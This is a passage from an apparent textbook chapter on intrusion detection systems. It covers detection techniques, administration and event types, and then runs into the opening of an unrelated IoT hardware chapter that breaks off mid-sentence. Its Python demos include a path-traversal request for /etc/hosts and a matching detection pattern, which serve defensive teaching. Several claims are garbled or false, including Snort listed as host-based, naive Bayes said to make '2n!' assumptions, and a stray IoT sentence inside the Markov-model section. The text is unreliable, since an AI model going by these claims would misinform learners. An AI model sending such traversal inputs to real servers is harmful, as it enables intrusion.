some HIDSs like Snort and Dragon Squire monitor a specific computer 
system [16]. The HIDS is usually deployed in the case of critical and sensi- 
tive servers. Just like NIDS, these also operate with a wide range of logging 
of data. Some data fields that are logged are the type of alert, IP addresses, 
source and destination of ports, timestamp containing date and time, etc. 
The Host-based systems are able to observe unencrypted activity if 
placed at the endpoints, something which other detection technologies like 
the NIDS are not able to offer. They function with an efficient combination 
of signature as well as anomaly-based techniques. They can analyze and 
filter both wireless and wired network traffic and code. HIDS monitors 
changes in the host kernel, host file system, and the program behaviour 
[17]. Files shared over the web and emails too can be examined. Some 
HIDS agents can also clean the network traffic that they encounter. Some 
can even monitor audio-video devices like cameras or microphones to 
detect an attack. 


7.2.2.2.3 Limitations

Since alerts are not reported on a real-time basis to a centralized manage- 
ment server, delays are frequent. Such delays mean that any event with 
rapidly spreading malware could pose a daunting situation. This, however, 
is not the case with smaller networks. Another drawback is the significant 
consumption of the host’s resources by the agent deployed to protect it. 
This consumption is manifested in the form of processor use, memory, and 
storage. Again, as a few detection techniques run only periodically, there is 
a possibility for the attack to creep in between two successive detections. 


7.2.3 Intrusion Detection Techniques 
7.2.3.1 Conventional Techniques 


The techniques that have been conventionally employed in intrusion 
detection are known as conventional techniques. These detection tech- 
niques are reliable to their users but are lacking in one critical aspect: they 
cannot detect new or foreign threats. Thus, new attacks are prone to get 
through despite these techniques being in place. But a significant advantage is that 
they are extremely capable of detecting known threats. The techniques can 
be divided into three broad divisions: 


i. Rule-based: Certain rules are decided beforehand and the 
data is traversed across this set of rules performing cer- 
tain specific functions. Data that fail to satisfy the rules 
are restrained by the intrusion detection system. These 
rules need to be updated by the administrator regularly. 
Though it efficiently detects known attacks, the rule-based 
intrusion detection cannot shield against foreign and new 
attacks. An important advantage is that the number of 
false alarms is lower. An efficient approach to go with is 
the State Transition Analysis where initial secured state 
and later compromised states are presented. 

ii. Signature-based: This intrusion detection is also known 
as misuse detection system. Within the analysed data, the 
signature-based detection system looks for patterns or 
signatures. It has a lot of signatures that are significant for 
catching the threat at the outset. The same is already col- 
lected in a repository of known data. This repository acts 
as a database of malicious threats. Thus, the unacceptable 
patterns are compared with network traffics and alerts. 
Unlike the anomaly-based methodology, this does not need 
to learn the environment and hence is easy to deploy [18]. 

iii. Anomaly-based: This is also called profile-based intrusion 
detection. In anomaly-based detections, just as the name 
suggests, the IDS looks for anomalies and works against a 
baseline profile depicting any known normal behaviour. 
That could be a pattern of any activity that reflects a signif- 
icant deviation from the behaviour otherwise considered 
normal. The anomaly-based detection can shield against 
novel attacks. Thus, unforeseen vulnerabilities can be effec- 
tively tackled by this technique. For example, it can spot 
a malformed Internet Protocol (IP) and new automated 
worms [19]. For comparing with existing data sets, a lot of 
information needs to be fed. It has an acceptable accuracy 
but a crucial downside is that the number of false alarms is 
very large. 


Figures 7.6 and 7.7 below represent the Signature-based and Anomaly-based 
techniques, respectively. 


Figure 7.6 Signature-based technique. 


Figure 7.7 Anomaly-based technique. 


Table 7.1. Comparison of conventional intrusion detection techniques. 

| Technique | Basis | Advantages | Disadvantages |
|---|---|---|---|
| Rule-based | It is based on predefined rules and those stored in database. | The number of false alarms produced is less. Familiar attacks are detected better. | Only previously known attacks are detected. Rules must be updated regularly. |
| Signature-based | It is based on signatures that are pre-existing in database. | The rate of false positives is low. | Previously unknown attacks cannot be detected. |
| Anomaly | It is based on deviation from normal behaviour. | Unknown attacks are detected better. It is easily configured. | A lot of false alarms are generated. |


Table 7.1 gives a comparison of the above three techniques. 
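
The trade-off in Table 7.1 can be seen by running a signature-based and an anomaly-based detector over the same requests. This is an added example, not code from the book; the signature patterns, the sample requests, the two features and the threshold of 3 standard deviations are all constructed assumptions.

```python
import re
import statistics

# Constructed signature repository: patterns of attacks that are already known.
SIGNATURES = {
    "path-traversal": re.compile(r"\.\./\.\./"),
    "known-worm-probe": re.compile(r"/constructed-worm\.cgi", re.IGNORECASE),
}

# Constructed "normal" traffic used to learn the baseline profile.
NORMAL_TRAFFIC = [
    "GET /index.html",
    "GET /products?id=12",
    "GET /products?id=7",
    "GET /images/logo.png",
    "POST /login user=alice",
    "GET /about.html",
    "GET /cart?item=3",
    "GET /search?q=router",
]

# Constructed test requests, one per situation discussed in the text.
SAMPLES = {
    "known attack": "GET /files?name=../../../../etc/hosts",
    "novel attack": "GET /app?data=" + "A" * 60,
    "unusual but benign": "GET /reports/2023/annual-summary-final-v2.pdf?download=true",
    "ordinary": "GET /products?id=9",
}


def signature_detect(request):
    """Misuse detection: return the names of known signatures found in the request."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(request)]


def features(request):
    """Numeric profile of a request: its length and share of non-alphanumeric characters."""
    specials = sum(1 for ch in request if not ch.isalnum())
    return (len(request), specials / max(len(request), 1))


class AnomalyDetector:
    """Profile-based detection: learn mean and standard deviation of each feature
    from normal traffic, then flag requests that deviate too far from that baseline."""

    def __init__(self, threshold=3.0):
        self.threshold = threshold
        self.profile = []

    def train(self, normal_requests):
        columns = list(zip(*(features(r) for r in normal_requests)))
        self.profile = [(statistics.mean(c), statistics.stdev(c)) for c in columns]

    def score(self, request):
        """Largest z-score over all features; guards against a zero deviation."""
        return max(
            abs(value - mean) / (stdev or 1e-9)
            for value, (mean, stdev) in zip(features(request), self.profile)
        )

    def detect(self, request):
        return self.score(request) > self.threshold


def compare(samples=SAMPLES):
    """Run both techniques and return {label: (signature hits, anomaly flag)}."""
    detector = AnomalyDetector()
    detector.train(NORMAL_TRAFFIC)
    return {
        label: (signature_detect(request), detector.detect(request))
        for label, request in samples.items()
    }


if __name__ == "__main__":
    for label, (hits, anomalous) in compare().items():
        print(f"{label:20} signature={hits or '-'} anomaly={anomalous}")
```

The novel request is missed by the signature engine but flagged by the anomaly engine, while the long but legitimate download is a false alarm from the anomaly engine only.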


7.2.3.2 Machine Learning-Based and Hybrid Techniques 


In Machine Learning models, the aim is to establish an implicit or explicit 
model. Although they are resource expensive in nature, such schemes 
can modify their execution strategy just as new details are acquired. The 
hybrid methodology (as shown in Figure 7.8) works with a combination of 
two or more methodologies. This means that the strengths of each of the 
individual methodologies are incorporated into one. For example, when 
an Anomaly-based engine to filter the data is combined with a Signature- 
based engine which detects the intrusions, the outcome is a hybrid detec- 
tion system. Interestingly, the general architecture of many Hybrid IDPSs 
imitates the human immune system [20]. This gives us a better system that 
has a high accuracy rate and can give very sound protection against new 
attacks. 


Figure 7.8 Architecture of hybrid-based methodology. 


i. Bayesian Network 
Bayesian Theory has been named after Thomas Bayes. 
When the Bayesian Probability model is heavily simplified, 
the outcome is a naive Bayes model that performs well. For 
a given situation, Bayesian networks can obtain a coherent 
result from probabilistic relationships. The Bayesian 
IDS is made of a naive Anomaly-based Bayesian classifier. 
The Bayesian filter contains a training engine and a testing 
engine [21]. 

For a series of n attributes, the classifier makes 2n! 
assumptions. Since these assumptions are independent, 
the probability of one does not impact that of another 
attribute [22]. Once the filter is trained, it can classify a 
TCP connection as either an attack or regular traffic. A 
drawback is that results depend heavily on these assumptions 
which can sometimes deviate and cause error [23]. 

ii. Markov Models 
Within the Markov models, there are two varieties. The 
first one is Markov Chains and the next one is Hidden 
Markov Models (HMMs). Both these techniques find wide 
application in a Host-based intrusion detection system. 
A classifier first segregates normal and abnormal traces 
and then the Markov Chain is built upon the set of normal 
traces [24]. A set of states that are connected through 
some transition probabilities is known as a Markov Chain. 
Afterward, the anomaly score for the observations is computed 
by comparison with some fixed threshold. In the 
Hidden Markov Model, only productions are visible while 
the states and transitions are hidden. IoT services in smart 
cities are of great interest; they are implemented not only 
for human welfare but also to reduce the operational costs 
in administration. 

iii. Genetic Algorithms 
While no previous knowledge about the system behaviour 
is taken up, this machine learning-based detection technique 
is able to select the optimal features for the detection 
process [25]. The genetic algorithms, as the name suggests, 
are conceptually inspired by the principles of evolutionary 
biology. Thus, the naturally observed processes of inheritance, 
natural selection, mutation, and recombination 
form the underlying core of the intrusion detections in 
this methodology. The biggest advantage of this technique 
is that it solves in a multi-directional manner, making efficient 
use of its strong global search method. 

iv. Artificial Neural Network 
The neural network derives its fundamental footing from 
the human brain and nervous system. Somewhat like our 
nervous system that consists of billions of neurons and 
trillions of synapses to get us functioning every second, 
the neural networks simulate a similar approach in the 
field of intrusion detection. An artificial neural network 
works upon the disadvantages of conventional IDSs like 
their time taking analysis, non-adaptability, need for regular 
updates, etc. It can recognize the intrusive nature of 
traffic patterns as well as create user profiles [26, 27]. 

v. Fuzzy Logic 
The fuzzy logic approach is used by a Fuzzy Intrusion 
Recognition Engine (FIRE) which is an anomaly-based 
intrusion detection system. It has a Network Data 
Collection system that is capable of collecting data from 
the data input for a given interval in order to detect any 
intrusions. It has been effectively utilized in port scans and 
probes. In the main IDS program, the fuzzy logic section 
is usually employed to manage the vast inaccuracies of the 
input data. The Fuzzy technique makes use of fuzzy variables 
under the Fuzzy set theory where the reasoning is 
approximate and not precise in nature. A fixed interval is 
demarcated in the processing scheme beforehand which 
would identify an observation as being either normal or 
abnormal [28]. A significant drawback is its huge resource 
consumption. 
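
The Markov chain approach described under Markov Models above can be sketched for a host-based sensor as follows. This is an added example, not code from the book: it builds a first-order chain from constructed normal system-call traces and scores a trace by its average negative log-likelihood against a fixed threshold. The traces, the smoothing constant and the threshold are assumptions, and the Hidden Markov Model variant is not covered.

```python
import math
from collections import Counter, defaultdict

# Constructed traces of system calls recorded during normal operation.
NORMAL_TRACES = [
    ["open", "read", "read", "write", "close"],
    ["open", "read", "write", "close"],
    ["open", "read", "read", "read", "close"],
    ["open", "write", "close"],
]
ALPHA = 0.1       # additive smoothing so unseen transitions keep a small probability
THRESHOLD = 1.2   # fixed threshold on the anomaly score (assumed value)


def build_chain(traces, alpha=ALPHA):
    """Count state-to-state transitions in the normal traces."""
    counts = defaultdict(Counter)
    for trace in traces:
        for cur, nxt in zip(trace, trace[1:]):
            counts[cur][nxt] += 1
    states = {state for trace in traces for state in trace}
    # One extra slot stands for every state never seen during training.
    return {"counts": counts, "slots": len(states) + 1, "alpha": alpha}


def transition_prob(chain, cur, nxt):
    """Smoothed estimate of P(nxt | cur); works for states unseen in training."""
    row = chain["counts"].get(cur, Counter())
    total = sum(row.values())
    return (row[nxt] + chain["alpha"]) / (total + chain["alpha"] * chain["slots"])


def anomaly_score(chain, trace):
    """Average negative log-likelihood per transition; higher means less normal."""
    pairs = list(zip(trace, trace[1:]))
    if not pairs:  # a single event carries no transition to judge
        return 0.0
    return -sum(math.log(transition_prob(chain, c, n)) for c, n in pairs) / len(pairs)


def is_anomalous(chain, trace, threshold=THRESHOLD):
    return anomaly_score(chain, trace) > threshold


if __name__ == "__main__":
    chain = build_chain(NORMAL_TRACES)
    observed = [
        ["open", "read", "write", "close"],                      # ordinary file access
        ["open", "read", "execve", "socket", "write", "close"],  # calls never seen in training
        ["open", "close", "open", "close", "write", "read"],     # known calls, unusual order
    ]
    for trace in observed:
        print(f"{anomaly_score(chain, trace):.3f}", is_anomalous(chain, trace), trace)
```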


7.2.4 Three Considerations 


Years of cumulative researches and experiences have shown that even the 
safest systems are vulnerable to computerized thefts, break-ins, and viruses 
[29]. An Intrusion Detection System, as opposed to the firewalls and tra- 
ditional access control methods, allows detection and assessment of the 
damage caused on a real-time basis [30]. Improvisation in technology and 
the administrative acumen to utilise them have certainly impacted the pro- 
cess enormously. In this section, three such considerations are discussed: 
location of sensors, security capabilities, and management capabilities. 


7.2.4.1 Location of Sensors 


This is a most crucial decision. As administrators decide on having the 
most suitable network to set the components right, they have an addi- 
tional task to determine a suitable location for sensors. It is always desired 
and acceptable to have passive sensors in place, for instance in the case of 
NBAs. These passive sensors effectively perform meticulous monitoring of 
the direct network. 


7.2.4.2 Security Capabilities 


The security capabilities offered by an Intrusion Detection and Prevention 
System are truly vast and extensive. Gathering of information, logging, 
prevention, and detection capabilities are the four most crucial functions 
that an IDPS performs. These functions are as described below. 


7.2.4.2.1 Gathering of Data 

The first and most fundamental step is the collection of information. A 
huge quantity of data from source and networks is generated and gath- 
ered from operating systems as well as the hosts after it is identified that 
they could be potential mischief-mongers. Large volumes of data that are 
fuzzy, noisy, and dynamic are analysed. The involvement of Data Mining 
has added a new dimension to the analysis of large quantities of data [31]. 
Information is collected to be pre-processed to remove the noise. As a first 
step, the irrelevant data is replaced while the rest of the data is analysed and 
bundled. 


7.2.4.2.2 Logging 

After collection, extensive logging of data is performed and the logs are 
stored either locally or centrally. These logs are crucial in the sense that 
they allow the administrator to validate the authenticity of alerts and estab- 
lish a correlation among detected threats. This serves as a massive database 
where the data fields are also equally important. The data fields which are 
generally logged in Network Behaviour Analysis include date and time, 
estimation on the severity of threats, prevention and impact of threats, net- 
work, transport and protocols of application layer. It is preferable to store 
them locally as well as centrally. When stored on local servers, the copies of 
logs are usually forwarded to the centralized security servers as well. 


7.2.4.2.3 Threat Detection 

A combination of techniques is generally used by a typical Intrusion 
Detection and Prevention system. Mostly anomaly-based detection is used 
as opposed to the signature-based detection. This is especially true for the 
NBAs. It is the tuning and customization capabilities that greatly deter- 
mine and largely differentiate one detection technology from the other. 
Using a combination of techniques facilitates greater flexibility in the tun- 
ing and customization domain. 

There are two types of detection methodologies. These are Knowledge- 
based detection and Behaviour-based detection. For it to be Knowledge- 
based detection, the IDS should be utilizing some sort of misuse detection, 
while Behaviour-based detection implies that Intrusion Detection follows 
the path of anomaly detection [32]. Following are the most common detec- 
tions that are usually observed. 


i. Alerts: Alerts are the signals generated whenever a poten- 
tial threat is detected by the IDS. Alerts can be flexibly 
designed as per the needs of the administrator and the 
demand of the networks. Thus, default settings regarding 
the severity and the type of information needed can be 
made. Basically, alerts are also switched between ‘ON’ and 
‘OFF’. 

ii. Blacklists: Blacklists allow the detection system to recog- 
nize all those activities which have been previously flagged 
as dangerous. Thus, malicious events can be identified 
quickly using this feature. The URLs, filenames, appli- 
cations, ICMP codes, TCP, or UDP port numbers are 
some of the entities that are detected in a bid to establish 
a connection between the current sample and an already 
recognized malicious activity. It relies heavily on the 
detection of characteristics akin to that of malware [33]. 
Signature-based detections usually go with Blacklists. 

iii. Whitelists: Contrary to blacklists, this list includes a num- 
ber of conducive and agreeable entities, such as discrete 
entities from verified hosts. Signature-based detections 
usually go with Whitelists along with Blacklists. They are 
important in the sense that the number of false positives 
can be reduced with the help of such a list in place. These 
should be checked by the administrator and updated 
regularly. 


7.2.4.2.4 Prevention of Threats 

Usually, there are a variety of prevention capabilities provided to any IDPS. 
The administrator has also got a plethora of roles to decide which of the 
multiple prevention capabilities is to be used, depending upon the type of 
alert. Prevention mostly comes into the picture when the system is about to 
detect a new threat. IDPSs also let the administrators specify the configu- 
ration for each form of an alert. Some of the general prevention capabilities 
are [34]: 


i. Ending TCP session: This is the passive-only approach. In 
this prevention method, the sensors end the TCP session 
currently in operation [35]. 

ii. Inline firewall: This is an active approach wherein the 
inline sensors impose an outright rejection of events that 
appear to be malicious in intent. 

iii. Administrator's program: An administrator can impose 
its script on sensors such that they operate this program 
under certain specific situations. 

iv. Both passive and inline approaches: Sensors in the Network 
Behaviour Analysis are empowered enough to push the 
network’s security devices like routers and firewalls to 
block suspicious activity through their reconfiguration. 


7.2.4.3 Management Capabilities 


After security capabilities have been assessed and the location of sensors 
determined, management comes into the picture. Implementation as well 
as operation and maintenance are the prime aspects of management. We 
briefly look at these below. 


7.2.4.3.1 Implementation 

The IDPS product needs to be chosen wisely as the first step. Thereafter, an 
efficient network architecture is designed by the administrator. Testing of 
components for operation and security is done to ensure that everything is 
fine before the organization deploys that IDPS product. While deploying 
the sensors, the aim is to deploy them within the minimum time gap. 
This is especially important as there is no need for these sensors to have 
different sets of inventories. This helps to keep up with the initial baseline. 


7.2.4.3.2 Operation, Updates, and Maintenance 
A console is that Graphical User Interface (GUI) or Command Line 
Interface (CLI) that has been entrusted with the task of operation and 
maintenance of the IDPS products like sensors and management servers. 
Even the updating and configuring of sensors are attributed to the console 
itself. Consoles also carry out the herculean task of analysing the reports 
and data generated by the detection system. 

Sensors, console, and management server need to be regularly given soft- 
ware updates. Appliance-based IDPSs like the NBA can be updated fairly sim- 
ply by rebooting the sensor, inducting the software, or even changing the CD. 


7.2.5 Administrators’ Functions 
7.2.5.1 Deployment 


The administrator has various roles at all stages while bringing the whole 
methodology into action. First, an IDPS product needs to be chosen. Once 
that is done, the network architecture needs to be designed. Next up, the 
deployment of the IDPS is done after ensuring a secure environment. The 
deployment of IDS in a large majority of corporate networks requires it to 
be scalable. 


7.2.5.2 Testing 


Care must be taken to examine the operation of the product in a test envi- 
ronment. This substantially reduces the problems during implementation. 
Again, operationalizing too many sensors at once can overwhelm the servers 
by producing tons of false positives. Care needs to be taken here as well. 


7.2.5.3 Security Consideration of IDPS 


Ensuring the safety of the IDPS should be the topmost priority since it 
contains sensitive data and is often on the attackers’ radar. If the IDPS gets 
attacked, the whole underlying system would become vulnerable. Direct 
access to IDPS should be limited, and strong authentication measures 
should be undertaken. There should be separate accounts for users and 
administrators. Additional protective layering like a virtual private net- 
work (VPN) can also be incorporated to minimize traffic. 


7.2.5.4 Regular Backups and Monitoring 


Administrators are also required to back up the configurations periodi- 
cally. They have a continuous job of monitoring security issues and vulner- 
abilities. They need to be supportive yet cautious of updates in the IDPS. 
Starting from the decision of employing the sensors at just the right place 
to further performing tuning and customization, the administrator has a 
binding influence throughout. 


7.2.6 Types of Events Detected 


i. DoS and DDoS Attacks 
The denial of service and the distributed denial of service 
attacks are fairly common detections. In this, the usage of 
bandwidth increases substantially. Distributed Denial of 
Service (DDoS) attacks are easily prevented by the denial 
of the capability approach. First of all, the legitimate traffic 
is segregated from malicious traffic and afterward the per- 
formance of legitimate traffic is reduced slowly. 

ii. Worms 
Worms are fairly common detections. They are detected 
comparatively easily as they tend to get those hosts com- 
municating with each other which normally they do not. 
They multiply and spread pretty fast. These worms use 
large bandwidth and some even start performing scan- 
ning. This helps the IDPS in catching them. 

iii. Scanning 
Scanning can be distinguished from others by its contrasting 
flow styles observed at the application, transport, 
and network layers [36]. Banner grabbing at the application 
layer, TCP and UDP port scanning at the transport 
layer, and Internet Control Message Protocol (ICMP) scanning 
at the network layer are some common examples. 

iv. Policy violations 
Administrators lay down firm and extensive policies that 
give an account of details that are concerned with permis- 
sions. Thus, the time of activity and the type of hosts and 
the forms of interaction are already specified by the admin. 
If any of this is found to be violated, for instance, the pres- 
ence of an unauthorized host, then the IDPS detects a pol- 
icy violation. 

v. Bots 
Botnets have recently become one of the primary threats 
to computer networks. A self-propagating application in 
nature, bots impact vulnerable hosts [37]. For their pur- 
pose to succeed, they could either employ Trojans or go for 
direct exploitation. These assume command and control, 
unlike malware [38]. 

vi. Forbidden applications 
Some application services as well as application protocols, 
backdoors, and tunnel protocols come under this category. 
The event occurring in this segment is checked against the 
expected protocols. 
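
Several of the event types above can be recognised from flow records alone. The following added example (not code from the book) classifies one time window of constructed flows into scanning, worm-like spreading, policy violations and forbidden applications; the addresses, the policy, the baseline of usual host pairs and both thresholds are assumptions, and DoS/DDoS and bot detection are left out.

```python
from collections import defaultdict

# Constructed administrator policy (assumed values).
POLICY = {
    "authorized_hosts": {"10.0.0.5", "10.0.0.6", "10.0.0.7", "10.0.0.8", "10.0.0.20"},
    "expected_ports": {53, 80, 443},
}
# Constructed baseline: host pairs that normally communicate with each other.
BASELINE_PAIRS = {
    ("10.0.0.5", "10.0.0.20"),
    ("10.0.0.6", "10.0.0.20"),
    ("10.0.0.7", "10.0.0.20"),
}
SCAN_PORTS = 10   # distinct destination ports probed on one target within the window
WORM_FANOUT = 3   # hosts contacted that the source normally never talks to


def detect_events(flows, policy=POLICY, baseline=BASELINE_PAIRS):
    """Classify (src, dst, proto, dport) flows from one window by event type."""
    ports_probed = defaultdict(set)      # (src, dst, proto) -> destination ports
    unusual_peers = defaultdict(set)     # src -> peers outside the baseline
    unexpected_ports = defaultdict(set)  # src -> (proto, port) outside the policy
    unauthorized = set()

    for src, dst, proto, dport in flows:
        if src not in policy["authorized_hosts"]:
            unauthorized.add(src)                       # policy violation
        if dport not in policy["expected_ports"]:
            unexpected_ports[src].add((proto, dport))   # candidate forbidden application
        ports_probed[(src, dst, proto)].add(dport)
        if (src, dst) not in baseline:
            unusual_peers[src].add(dst)

    scanners = {
        src for (src, _dst, _proto), ports in ports_probed.items()
        if len(ports) >= SCAN_PORTS
    }
    worms = {src for src, peers in unusual_peers.items() if len(peers) >= WORM_FANOUT}
    # A scanner touches many unexpected ports by definition; report it once, as a scan.
    forbidden = set(unexpected_ports) - scanners

    return {
        "scan": sorted(scanners),
        "worm": sorted(worms),
        "policy-violation": sorted(unauthorized),
        "forbidden-application": sorted(forbidden),
    }


def sample_flows():
    """Constructed window of traffic containing one instance of each event type."""
    flows = [
        ("10.0.0.5", "10.0.0.20", "tcp", 443),    # ordinary traffic
        ("10.0.0.6", "10.0.0.20", "tcp", 80),     # ordinary traffic
        ("10.0.0.99", "10.0.0.20", "tcp", 443),   # host that is not authorized
        ("10.0.0.5", "10.0.0.20", "tcp", 6667),   # protocol outside the expected set
    ]
    # One host probing sixteen ports on the same target.
    flows += [("10.0.0.7", "10.0.0.20", "tcp", port) for port in range(20, 36)]
    # One host suddenly contacting three peers it normally never talks to.
    flows += [("10.0.0.6", peer, "tcp", 80) for peer in ("10.0.0.5", "10.0.0.7", "10.0.0.8")]
    return flows


if __name__ == "__main__":
    for kind, sources in detect_events(sample_flows()).items():
        print(f"{kind:22} {sources}")
```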


7.2.7 Role of State in Network Security 


A state has tremendous amounts of information that it juggles daily. Since 
the dawn of the digital era, while bidding adieu to paper modes, the com- 
puter networks have often been vested with overwhelming responsibilities. 
In disciplines like defence, communication, energy, etc., data has assumed 
a stellar role, which also points to more vulnerability. 

Thus, it becomes a necessity for the state to come up with solid regula- 
tions and protocols in place that adhere to industry standards. 

The government has been focussing with renewed vigour on the devel- 
opment of state standards and criteria. For example, the DOD 5200.28- 
STD trusted by NCSC enforces objective evaluation of computer security 
[39]. Here, predefined thresholds are strictly adhered to, which if found 
exceeding, leads to termination of the event. There is a lot of scope for the 
state’s facilitation of research in adjoining areas like IDPS environment and 
security, social and operational aspects of intrusion detection, and novel 
detection methods [40]. 


7.3 Literature Review 


In this section, some of the works done in the field of Intrusion Detection 
and Prevention Systems will be reviewed. Major researchers have given a 
lot of breakthroughs with the usage of IDPS in terms of security; however, 
more work is expected in the field, and this review hopes to motivate readers 
to pursue their interest in the field. Radoglou and Sarigiannidis [41] 
used IDPS technology in order to secure the smart grids being used in the 
smart city infrastructure’s electrical grid; with increased reliability in the 
power grid, the smart city will be more efficient, economically and socially 
as well. 

Baykara and Das [42] proposed a honeypot-based approach for improv- 
ing the existing system of IDPS. The main usage of honeypot helped the 
system to gain real-time access of the data, with low-cost management and 
management of the system. This setting of the IDPS allowed itself to detect 
the zero-day attacks in real time. 

Tan and Sherwood [43] presented an improved version of string match- 
ing algorithm for the IDS systems in order to improve the speed of the sys- 
tem without having to go through crashes or unintentional system drops. 
Their experiment was based on converting the large amount of strings into 
tiny state machines, each of which works on a single rule, hence 
improving the overall complexity. 

In order to prevent Supervisory Control and Data Acquisition (SCADA) 
from data frauds and breaches, Zhu and Sastry [44] presented the taxon- 
omy of the techniques that can be used to prevent such attacks, in which 
IDPS is also a key participant. They presented the voids and defects with 
the IDPS system and motivated researchers to further improve the system. 

More et al. [45] presented an architecture for the system of IDPS to 
work in a manner that can correlate heterogeneous data sources using the 
cross-referencing features of the signature-based IDPS. The major out- 
come of their experiment was a knowledge base which is being used to 
model other systems for detecting cyber-attacks and vulnerabilities. 

Patel et al. [46] worked on improving the anomaly detection in IDPS, 
by proposing a self-managed agent-based approach which assesses the risk 
management as well, using the Autonomic Computing (AC) principles of 
self-management. This method will help in not just the detection, but the 
stopping of the attack before the system is critically damaged. 

Ribeiro et al. [47] proposed an android-based solution for the IDPS, 
termed as HIDROID, which does not provide any complexity on the mobile 
system. The model used in the application is made for the detection of 
benign behaviour. Their application is a self-learner, and does not require 
much interaction with malicious data to learn about the anomalies. This 
application provided an accuracy of up to 0.9 in ideal situations. 

The work done in the field has been summarized in Table 7.2; it majorly 
talks about the current open challenges that can be faced by the current 
researchers of the field. 


Table 7.2 Summary of literature review. 

| Radoglou and Sarigiannidis [41] | Smart Grid | Efficiency |
| Baykara and Das [42] | HoneyPot | Detects the zero day attacks in real time |
| Tan and Sherwood [43] | String Matching in IDPS | Improving the overall complexity |
| Zhu and Sastry [44] | SCADA | Prevention from data frauds |
| More et al. [45] | Signature based IDPS | Correlation of heterogeneous data sources |
| Patel et al. [46] | Anomaly detection in IDPS | Stopping of the attack before critically damaging the system |
| Ribeiro et al. [47] | HiDroid | Application is a self-learner |


7.4 Conclusion 


A substantial amount of research is going on in the field of Intrusion 
Detection. By no means should this be considered an exhaustive solution 
at its present position. Suffice to say that developments in this field are at a 
nascent stage and there is a lot of scope for further changes and development. 
Spreading awareness about data security, sensitizing the masses, and 
encouraging organizations to devote a part of their resources towards safeguarding 
their computer networks and data, is the need of the hour. Timely 
and appropriate interventions by the state along with civilians would prove 
to be pivotal in this direction. 


Abstract 

Sensing any environmental conditions and acting on behalf of it is the basis of IoT 
Technology. One might wonder how physical parameters can be changed on the 
basis of only sensing, but that’s the most attractive part of IoT technology. Imagine 
the milk jug in our refrigerator telling us through an application notification that 
the milk is about to run out and we should refill it, or even the milk jug sending 
signals to the milk vendor to come to the house to refill it. It sounds unrealis- 
tic, but that’s what Internet of Things (IoT) technology can create. Imaginations 
are the wisdom that encompass human satisfaction level. There are many hard- 
ware devices which are compatible with IoT. Their working part is discussed here 
regarding the Arduino and Raspberry Pi hardware which have equal capability 
of inventing new unimaginable horizons in IoT. These devices can be used for 
numerous applications within IoT. The whole architecture consists of sensor data, 
clouds, processing, notification. 


Keywords: BLE, LPDDR, REST, HTTP, WiMAX, GPIO 


8.1 Introduction 


Integrating with IoT is possible with a few hardware devices such as 
Arduino and Raspberry Pi hardware which are equally capable of invent- 
ing new unimaginable horizons in IoT. Arduino is an actuator or a small 
microcontroller sort of device whereas Raspberry Pi is a mini computer. 
The basic difference between the two lies in the computational power and 
different work capacities involved. Moreover, Raspberry Pi is a bigger subset 
which engulfs Arduino too. Discussing both, a methodology should be 
devised to gain maximum insights into their computational abilities and 
how they can transform the IoT industry. 

The whole architecture of IoT involves sensors, actuators, cloud, data 
processing, gathering analytical data, sending automatic updates and noti- 
fying users of any aberration. For example, opening a garage door, the 
sensors can sense the environmental changes (Proximity sensor) and then 
send data to the actuator which are mechanical in nature (motor) and they 
act on those changes as instructed. This small work structure can be com- 
pleted using an Arduino device. 

As in the case, for example, of weather monitoring, when there is a lot 
of data and complexity involved or bulk data processing and filtering, then 
the Raspberry Pi hardware device is used. The sensors can send all of the 
data to the cloud as the data is heavy (regular monitoring) and needs a lot 
of filtering and analysis to be done before any useful data can be fetched 
out. This scenario needs a full IoT infrastructure to thrive including clouds, 
processing center, analytical center, etc. 

Currently, in the market, there are many applications where IoT finds a 
suitable use. These applications include the Medical field, Health domain, 
Agriculture production, Weather Monitoring, Surveillance, Machine 
learning models, Smart cities, Satellite communications, etc. There is vast 
usage of IoT devices for increasing the efficiency and accuracy of gadgets 
and therefore helping humanity in many ways. This was my motivation in 
compiling this chapter. 

IoT has proved itself capable of shaping the future of the digital world. 
In the sections below, IoT-compatible hardware devices, case studies with 
real-life application scenarios, drawbacks of IoT technology and challenges 
in IoT infrastructure are discussed. 


8.2 Literature Review 


Below are some of the research papers that have done work similar to what 
I am proposing in this chapter. 

In [1], Air quality measurement is discussed. Increasing population lev- 
els have led to a decrease in air quality, which leads to detrimental effects 
on our body. Poor air quality is the main propellant for chronic diseases. 
The main substance is carbon monoxide, which can be measured by sen- 
sors and then remotely monitored by devices at home and also at public 
places. The updates can be pushed to the subscriber. 

In the paper, Arduino and Raspberry Pi are used to measure the soil 
moisture content of plants with the help of HTU 211D sensor element. 
The sensors are used for measuring the temperatures from the surroundings 
and storing displayed information. In this work, the ESP8266 Wi-Fi module has 
been used for data storing purpose [2]. 

An IoT-based patient health monitoring system enables the doctor 
to get regular health-centric updates about the patient with the help of 
Raspberry Pi connected to the server with internet. A patient's health sta- 
tus can be monitored by device/sensor deployed with the patient and all 
health parameters are sent to the doctor’s mobile application or to a central 
server with proper authentication. This is IoT-based remote technology for 
medical treatment for patients [3]. 

In this paper, Raspberry Pi acts as a sensor node and a centrally controlled 
controller. With hardware device integration, IoT has become the most 
versatile platform for various application services. Here, the Raspberry Pi 
is used to develop this, because it works as a sensor node and as a control- 
ler. In this paper, a health monitoring system has been proposed [4]. 

In the present work, an IoT-based real-time energy monitoring system 
is created to monitor and control a switch gear industry need. Daily energy 
needs of an industry are monitored and a summative assessment is sent to 
the server for analysis to be done for future supply [5]. 

In the paper, an affordable IoT-based solution is discussed that will 
increase COVID-19 indoor safety. The aspects which it will cover are 
contactless temperature sensing, mask detection and minimum distance 
maintained between individuals. The temperature sensing will be done 
automatically by infra-red sensors, and the other two activities will be per- 
formed by Raspberry Pi-enabled computer vision techniques [6]. 

Continuous monitoring of crops is indispensable for the cultivation of 
agriculture. A new AGRO IoT system is developed where an automatic 
mirroring and reconfiguration of remote monitoring system is deployed. 
The functions it supports are lessening downtime and making efficient
use of the available computational resources [7].

In the paper, an automatic weather monitoring system is discussed 
which will regularly note the weather-related data values of a location along 
with all the parameters like temperature, humidity, pressure, and breeze 
velocity, and then relay these values to a centralized server or database to 
help monitor analytic data over a period of time. The system also includes 
wireless technology, electronic devices and sensors [12]. 

The paper below provides an IoT-oriented comparison of various boards,
with a suitable selection of hardware development platforms that are
capable enough to improve the understanding of the technology and
methodology to facilitate the developer’s requirements. This paper also
summarizes various capabilities of the available hardware development
platforms for IoT and provides a method to solve real-life problems by
building and deploying powerful Internet of Things notions [13].

The above literature review discusses applications concerning the
